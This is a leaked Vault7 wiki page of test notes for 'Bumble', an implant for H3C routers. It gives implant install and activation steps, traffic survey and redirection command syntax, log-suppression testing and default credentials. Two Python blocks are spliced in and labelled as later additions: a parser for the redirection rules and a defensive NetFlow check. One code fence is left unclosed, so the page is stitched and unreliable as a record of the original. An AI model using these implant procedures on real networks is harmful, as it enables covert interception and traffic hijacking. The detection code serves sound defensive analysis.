Vault7: CIA Hacking Tools Revealed
Owner: User #14587667
Bumble 3.0.0/3.1 Test Notes
Test Summary
- Downloaded and installed Ubuntu Server 10.04. This is the library version that was delivered with Bumble.
- CT 2.4, which was delivered, is not compatible with the current ICON image (Debian 7.8).
- MTU settings
  - The CT MTU setting cannot go below 120 bytes.
  - Egress from Atk: setting the delaysim MTU <= 108 and the CT MTU < 128 allows CT to connect, but it reports "current packet size restrictions are incompatible with selected Score protocol".
  - Ingress to Atk: MTU <= 508 bytes.
  - Score requires a minimum MTU of 480 bytes for return traffic (from implant to CT).
- Flux will not be used with this tool, so it will not be tested with Flux.
Progress/Notes
- Sample survey commands:
  - tp survey create 192.0.0.0 255.0.0.0 0 0.0.0.0 0.0.0.0 0 icmp -en
  - tp survey create 192.0.0.0 255.0.0.0 0 0.0.0.0 0.0.0.0 0 tcp -en
- Sample redirection rule:
  - redir create 10.1.243.2 255.255.255.255 0 0 XXX.X.XXX.XXX (JUMPSTART-5[US]) 255.255.255.255 0 0 tcp 10.1.243.2 0 XXX.X.XXX.XXX (JUMPSTART-5[US]) 0 0 -en
ID | Status | Task |
---|---|---|
2 | complete | Potential bug: |
16 | complete | Potential Bug: When running my expect script, copying the patch.bin file timed out. Afterwards I attempted to reboot the H3C and it gave the below message. This occurred when I used the command "copy ftp://administrator:password@XXX.XXX.XXX.X (DNIC-RNET-192-100-100[US])/patch.bin patch.bin" to copy the patch file. This is not the recommended way to copy the file. No bug to report at this time. |
17 | complete | Potential Bug: It appears that if the patch.bin file exists on cfa0: and you attempt to copy it again, it "copies" indefinitely. Issuing the command "dir cfa0:" shows that the patch.bin file size is 0. This may occur when the patch file was incompletely applied. This may have just occurred when I used the command "copy ftp://administrator:password@XXX.XXX.XXX.X (DNIC-RNET-192-100-100[US])/patch.bin patch.bin" to copy the patch file. This is not the recommended way to copy the file. No bug to report at this time. |
Tests
- Smoke Tests
  - Install PBD and Establish Comms
    - Refer to Bumble command script on share.
- Survey - ct_pt1-survey.exp
  - Reboot DUT, install implant, establish comms via CT.
  - Confirm implant is installed and activate score:
    - tp cmd "pbd probe"
    - module show
    - redir show
    - module start score
    - module show (confirm score is activated)
    - redir show (there should be no rules)
  - Add survey rule: tp survey create XXX.X.XXX.X (JUMPSTART-5[US]) 255.255.255.0 0 0.0.0.0 0.0.0.0 0 tcp -en
  - redir show
  - <sleep for 20 seconds to allow time to survey>
  - Retrieve trans table: tp showtrans
  - quit
  - Successfully tested with the following Bumble versions:
    - Bumble 3.0.0
    - Bumble 3.1 Beta (9/15/2015 w/o latency)
- Redirection - ct_pt2-redir.exp
  - Reboot DUT, install implant, establish comms via CT.
  - Confirm implant is installed and activate score (see Test 2 for commands to run).
  - Add redir rule: redir create 192.168.254.6 255.255.255.255 0 0 XXX.XXX.X.XX (GB) 255.255.255.255 0 0 any XXX.XXX.XX.X (EU-MAP-5[US]) 0 XX.XX.XXX.XX (EARTHLINKBUSINESS-BLK[US]) 0 0
    - Source IP/Mask: 192.168.254.6/32 - Atk VM
    - Source Port Range: 0 0 (any)
    - Destination IP/Mask: XXX.XXX.X.XX (GB)/32 - WWW3
    - Destination Port Range: 0 0 (any)
    - Protocol: TCP
    - New Source IP:Port: 192.168.254.6:0 - Atk VM
    - New Destination IP:Port: XX.XX.XXX.XX (EARTHLINKBUSINESS-BLK[US]):0 - WWW4
    - TTL: 0 (don't change)
  - Successfully tested with the following Bumble versions:
    - Bumble 3.0.0
    - Bumble 3.1 Beta (9/16/15 w/o latency)
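The field-by-field breakdown above is the only place the page spells out the "redir create" syntax. As an added example (not Bumble code and not part of the original notes), the following parser turns one such rule line into labelled fields and renders it back in the same field-by-field form, so an analyst reading captured operator notes or logs can check a rule without counting fourteen tokens by hand. The field order is taken from the page; the "udp" and "icmp" protocol keywords, the treatment of a trailing "-en" as an enable flag, and the sample rule (RFC 5737 documentation addresses standing in for the redacted ones) are assumptions.

```python
# Added example (not Bumble code): parse the 14-field "redir create" rule
# syntax as laid out in the per-field breakdown of the redirection test.
# Field order is taken from the page; the udp/icmp keywords and reading
# the trailing "-en" as an enable switch are assumptions.
import ipaddress
from dataclasses import dataclass

PROTOCOLS = {"tcp", "udp", "icmp", "any"}  # only "tcp" and "any" appear on the page


@dataclass(frozen=True)
class RedirRule:
    src: ipaddress.IPv4Network   # Source IP/Mask
    src_ports: tuple             # Source Port Range (lo, hi); 0 0 = any
    dst: ipaddress.IPv4Network   # Destination IP/Mask
    dst_ports: tuple             # Destination Port Range
    proto: str                   # Protocol keyword
    new_src: tuple               # New Source (ip, port)
    new_dst: tuple               # New Destination (ip, port)
    ttl: int                     # TTL; 0 = don't change
    enabled: bool                # trailing -en present


def _network(ip, mask):
    """IP + dotted mask -> IPv4Network; strict=False accepts host bits in the address."""
    return ipaddress.IPv4Network(f"{ip}/{mask}", strict=False)


def _port_range(lo, hi):
    lo, hi = int(lo), int(hi)
    if not (0 <= lo <= hi <= 65535):
        raise ValueError(f"bad port range {lo} {hi}")
    return (lo, hi)


def _endpoint(ip, port):
    ipaddress.IPv4Address(ip)  # raises ValueError on a malformed address
    port = int(port)
    if not 0 <= port <= 65535:
        raise ValueError(f"bad port {port}")
    return (ip, port)


def parse_redir_rule(line):
    """Parse one 'redir create ...' line into a RedirRule; raise ValueError otherwise."""
    tokens = line.split()
    if tokens[:2] != ["redir", "create"]:
        raise ValueError("not a 'redir create' rule")
    args = tokens[2:]
    enabled = bool(args) and args[-1] == "-en"
    if enabled:
        args = args[:-1]
    if len(args) != 14:
        raise ValueError(f"expected 14 fields, got {len(args)}")
    (src_ip, src_mask, sp_lo, sp_hi, dst_ip, dst_mask, dp_lo, dp_hi,
     proto, ns_ip, ns_port, nd_ip, nd_port, ttl) = args
    proto = proto.lower()
    if proto not in PROTOCOLS:
        raise ValueError(f"unknown protocol {proto}")
    ttl = int(ttl)
    if not 0 <= ttl <= 255:
        raise ValueError(f"bad TTL {ttl}")
    return RedirRule(
        src=_network(src_ip, src_mask), src_ports=_port_range(sp_lo, sp_hi),
        dst=_network(dst_ip, dst_mask), dst_ports=_port_range(dp_lo, dp_hi),
        proto=proto, new_src=_endpoint(ns_ip, ns_port),
        new_dst=_endpoint(nd_ip, nd_port), ttl=ttl, enabled=enabled)


def describe(rule):
    """Render a rule in the field-by-field form used in the test notes."""
    def ports(r):
        return "%d %d%s" % (r[0], r[1], " (any)" if r == (0, 0) else "")
    return [
        f"Source IP/Mask: {rule.src.with_prefixlen}",
        f"Source Port Range: {ports(rule.src_ports)}",
        f"Destination IP/Mask: {rule.dst.with_prefixlen}",
        f"Destination Port Range: {ports(rule.dst_ports)}",
        f"Protocol: {rule.proto.upper()}",
        f"New Source IP:Port: {rule.new_src[0]}:{rule.new_src[1]}",
        f"New Destination IP:Port: {rule.new_dst[0]}:{rule.new_dst[1]}",
        f"TTL: {rule.ttl}" + (" (don't change)" if rule.ttl == 0 else ""),
        f"Enabled: {rule.enabled}",
    ]


# Constructed sample rule: RFC 5737 documentation addresses replace the
# redacted ones on the page.
SAMPLE_RULE = ("redir create 192.168.254.6 255.255.255.255 0 0 "
               "198.51.100.3 255.255.255.255 0 0 tcp "
               "203.0.113.1 0 198.51.100.4 0 0 -en")

if __name__ == "__main__":
    for text in describe(parse_redir_rule(SAMPLE_RULE)):
        print(text)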
- Transaction Table rollover
  - Reboot DUT, install implant, establish comms via CT.
  - Start score: module start score
  - Configure transtable aging time to 1 second: tp filter -t 1
  - From Atk: wget --output-document=- http://XXX.XXX.X.XX (GB)
    - Response should be from Bumble webserver #3 - XXX.XXX.X.XX (GB)
  - Add redir rule: redir create 192.168.254.6 255.255.255.255 0 0 XXX.XXX.X.XX (GB) 255.255.255.255 0 0 any XXX.XXX.XX.X (EU-MAP-5[US]) 0 XX.XX.XXX.XX (EARTHLINKBUSINESS-BLK[US]) 0 0 -en
  - Test redir rule: wget --output-document=- http://XXX.XXX.X.XX (GB)
    - Response should be from Bumble webserver #4 - XX.XX.XXX.XX (EARTHLINKBUSINESS-BLK[US])
  - Fill up transtable (run Ixia)
  - Add a survey rule: tp survey create 192.0.0.0 255.0.0.0 0 0.0.0.0 0.0.0.0 0 tcp -en
  - Check if redir still functions correctly: wget --output-document=- http://XXX.XXX.X.XX (GB)
    - Response should be from Bumble webserver #4 - XX.XX.XXX.XX (EARTHLINKBUSINESS-BLK[US])
- Swiffer - Log Suppression
  - Install PBD and Establish Comms
- Redirection Test - ACL circumvention
  - Not plausible with current implant hook point.
- Redirection Test (Lack of route on downstream router)
  - Single Rule - ct_pt3-redir.exp (script starts at step iv)
    - Add default route to ASR: ip route 0.0.0.0 0.0.0.0 XXX.XXX.XX.X (EU-MAP-5[US]) name To_MSR
    - From Atk VM, ping XXX.XXX.XX.X (EU-MAP-5[US]). It should be successful.
    - Remove default route from ASR: no ip route 0.0.0.0 0.0.0.0 XXX.XXX.XX.X (EU-MAP-5[US]) name To_MSR
    - From Atk VM, ping XXX.XXX.XX.X (EU-MAP-5[US]). It should fail.
    - Add redir rule: redir create 192.168.254.6 255.255.255.255 0 0 XX.XX.XXX.X (EARTHLINKBUSINESS-BLK[US]) 255.255.255.255 0 0 any XXX.XXX.XX.X (EU-MAP-5[US]) 0 XX.XX.XXX.X (EARTHLINKBUSINESS-BLK[US]) 0 0 -en
    - From Atk VM, ping XXX.XXX.XX.X (EU-MAP-5[US]). It should be successful.
    - Successfully tested with the following Bumble versions:
      - Bumble 3.1 Beta (9/16/2015 w/o latency)
  - Multiple Rules
    - Repeat steps from previous test. Use the following rules:
      - Loopback on ASR1002: redir create 192.168.254.6 255.255.255.255 0 0 XX.XX.XXX.X (EARTHLINKBUSINESS-BLK[US]) 255.255.255.255 0 0 any XXX.XXX.XX.X (EU-MAP-5[US]) 0 XX.XX.XXX.X (EARTHLINKBUSINESS-BLK[US]) 0 0 -en
      - WWW4 behind ASR: redir create 192.168.254.6 255.255.255.255 0 0 XX.XX.XXX.XX (EARTHLINKBUSINESS-BLK[US]) 255.255.255.255 0 0 any XXX.XXX.XX.X (EU-MAP-5[US]) 0 XX.XX.XXX.XX (EARTHLINKBUSINESS-BLK[US]) 0 0 -en
    - Successfully tested with the following Bumble versions:
      - Bumble 3.1 Beta (9/17/2015 w/o latency)
  - Repeat steps from previous test. Use the following rules:
    - Single Rule - ct_pt3-redir.exp (script starts at step iv)
- Redirection Test - Only specified protocol gets redirected
  - Add redirection rule to allow TCP from Atk VM to WWW4 behind ASR: redir create 192.168.254.6 255.255.255.255 0 0 XX.XX.XXX.XX (EARTHLINKBUSINESS-BLK[US]) 255.255.255.255 0 0 tcp XXX.XXX.XX.X (EU-MAP-5[US]) 0 XX.XX.XXX.XX (EARTHLINKBUSINESS-BLK[US]) 0 0 -en
  - Retrieve webpage from Atk VM: wget --output-document=- http://XX.XX.XXX.XX (EARTHLINKBUSINESS-BLK[US]). This should successfully retrieve the webpage.
  - From Atk VM, ping XX.XX.XXX.XX (EARTHLINKBUSINESS-BLK[US]). You should not get a ping response.
  - Successfully tested with the following Bumble versions:
    - Bumble 3.1 Beta (9/17/2015 w/o latency)
- Redirection Test - Lack of routes on MSR
  - What would be a good scenario?
- Redirection Test - NMAP Scan
  - Add redir rule
  - Start IXIA traffic
  - Start limited nmap scan
- Swiffer while redir rules enabled
  - Repeat test 3.
- Redirection Test - MiTM
  - Not applicable to JQJARGON. Functionality not tested.
- Survey and Redirection used simultaneously
  - This is NOT recommended, so it will not be tested.
- Forensics Test - Inspect Netflow on SolarWinds
- Ad hoc test - ICON disconnected during PBD (patch) installation
  - telnet 192.168.168.5 (admin/admin)
  - ftp XXX.XXX.XXX.X (DNIC-RNET-192-100-100[US]) (administrator/password)
  - ftp patch file to MSR:
    - bin
    - get patch.bin
    - quit
  - dir cfa0: !Confirm patch.bin was copied
  - install activate patch cfa0:/patch.bin slot 0
  - Before the patch completes, reboot the ICON VM.
  - BUM-3
- Reconfigured interface
  - With implant installed, configure another gigabit interface.
  - No observables - Successfully tested with the following Bumble versions:
    - Bumble 3.0.0
- Install PBD when PBD is already installed
- Uninstall PBD and re-attack
- Forensics Tests
  - Uninstall and check for remnants left behind
  - Inspect pcap
- Performance testing (IXIA)
  - Add IXIA ports directly to MSR. Need to determine IPs to use (look at config).
  - Configure IXIA "hosts" to test connectivity to WWW1 and WWW2 (XXX.X.XXX.XXX (JUMPSTART-5[US]) & .112).
- Backup MSR config
- Copy off MSR f/w
- Upload MSR f/w
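The forensics items above ("Inspect Netflow on SolarWinds", "Inspect pcap") list what to look at but not what a redirected flow looks like in the export. As an added example from the defender's side (not from the page and not part of the test plan), the check below runs over a constructed NetFlow/NetStream-style export taken on two interfaces of the same router. It assumes that records on the client-facing interface are cached before any on-device rewrite and records on the upstream interface after it; under that assumption a redirected flow appears as a destination that enters the router but never leaves toward it, paired with a destination that leaves without any client having asked for it. The CSV layout, interface names and addresses are all constructed.

```python
# Added example (not from the page): cross-interface flow check for the
# NetFlow/NetStream forensics test.  Assumes the router exports the
# client-facing ("in") interface before any on-device rewrite and the
# upstream ("out") interface after it; the CSV layout is constructed.
import csv
import io
from collections import Counter

# Constructed export: one flow per line, two vantage points on the router.
# The 198.51.100.3 -> 198.51.100.4 substitution mirrors the WWW3 -> WWW4
# redirection exercised in the tests above.
FLOW_EXPORT = """\
iface,src_ip,src_port,dst_ip,dst_port,proto,packets
in,192.168.254.6,41222,198.51.100.3,80,tcp,12
in,192.168.254.6,41223,198.51.100.3,80,tcp,9
in,192.168.254.6,51000,198.51.100.9,443,tcp,30
out,192.168.254.6,41222,198.51.100.4,80,tcp,12
out,192.168.254.6,41223,198.51.100.4,80,tcp,9
out,192.168.254.6,51000,198.51.100.9,443,tcp,30
"""


def load_flows(text):
    """Parse the CSV export into dicts with numeric ports and packet counts."""
    rows = list(csv.DictReader(io.StringIO(text)))
    for r in rows:
        r["src_port"] = int(r["src_port"])
        r["dst_port"] = int(r["dst_port"])
        r["packets"] = int(r["packets"])
    return rows


def destination_counts(rows, iface):
    """Flow count per (dst_ip, dst_port, proto) seen on one interface."""
    counts = Counter()
    for r in rows:
        if r["iface"] == iface:
            counts[(r["dst_ip"], r["dst_port"], r["proto"])] += 1
    return counts


def find_redirection_evidence(rows, inbound="in", outbound="out"):
    """Destinations present on only one side: the footprint of an in-path rewrite.

    This needs no join on the source, so it still works when the rule also
    rewrites the new source address.
    """
    seen_in = destination_counts(rows, inbound)
    seen_out = destination_counts(rows, outbound)
    return {
        "requested_but_never_forwarded": {k: v for k, v in seen_in.items() if k not in seen_out},
        "forwarded_but_never_requested": {k: v for k, v in seen_out.items() if k not in seen_in},
    }


def pair_rewritten_flows(rows, inbound="in", outbound="out"):
    """Match inbound and outbound records by (src_ip, src_port, proto) and return
    (requested_dst, actual_dst) pairs whose destination changed in transit.
    Only meaningful when the source endpoint is left unchanged by the rewrite."""
    out_by_src = {}
    for r in rows:
        if r["iface"] == outbound:
            out_by_src[(r["src_ip"], r["src_port"], r["proto"])] = (r["dst_ip"], r["dst_port"])
    pairs = []
    for r in rows:
        if r["iface"] != inbound:
            continue
        requested = (r["dst_ip"], r["dst_port"])
        actual = out_by_src.get((r["src_ip"], r["src_port"], r["proto"]))
        if actual is not None and actual != requested:
            pairs.append((requested, actual))
    return pairs


if __name__ == "__main__":
    flows = load_flows(FLOW_EXPORT)
    for label, hits in find_redirection_evidence(flows).items():
        print(label, dict(hits))
    for requested, actual in pair_rewritten_flows(flows):
        print("rewritten:", requested, "->", actual)
```

If the implant's hook point rewrites the packet before the flow cache on either interface sees it, both views agree and this check stays silent; in that case the same comparison has to be made between the router export and a pcap taken on the client side, which is what the "Inspect pcap" item supplies.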
Operator Notes
- Do not use survey and redirection at the same time.
ToDo:
ID | Status | Task |
---|---|---|
14 | complete | User #14587667 Delete default route on all routers (except MSR) after testbed complete (Not sure I should do this). May just test redirection traversing an ACL. Neighboring routers probably have routes back to the H3C, however secondary neighbors may not have routes back. May be useful to re-configure testbed to have secondary routers that don't have routes back to H3C. Deleted on all routers except 3845, 2811, and 2911 |
15 | complete | User #14587667 Get 2800 router from NDB Lab (R6/U27) |
6 | complete | User #14587667 Put 1E1 HWIC in 2800 router |
7 | complete | User #14587667 Setup SNMP on SolarWinds and configure MSR. |
8 | complete | User #14587667 Setup loopbacks on MSR neighbor routes. Use downstream IPs from MSR static routes. |
5 | complete | User #14587667 Configure syslog server |
3 | complete | User #14587667 Configure OSPF on MSR |
10 | complete | User #14587667 Configure OSPF on Cisco (Grab new router and use Gig int for OSPF - per target config). Use IP 192.168.168.5/30 on MSR and 192.168.168.6 on Cisco. |
0 | complete | User #14587667 Configure E1 links |
11 | complete | User #14587667 Configure netstream on MSR interface to TRCore (in-/out-bound). |
12 | complete | User #14587667 Configure netstream on MSR interface to 2911 (inbound). |
13 | complete | User #14587667 Confirm netflow is being collected by SolarWinds |
1 | incomplete |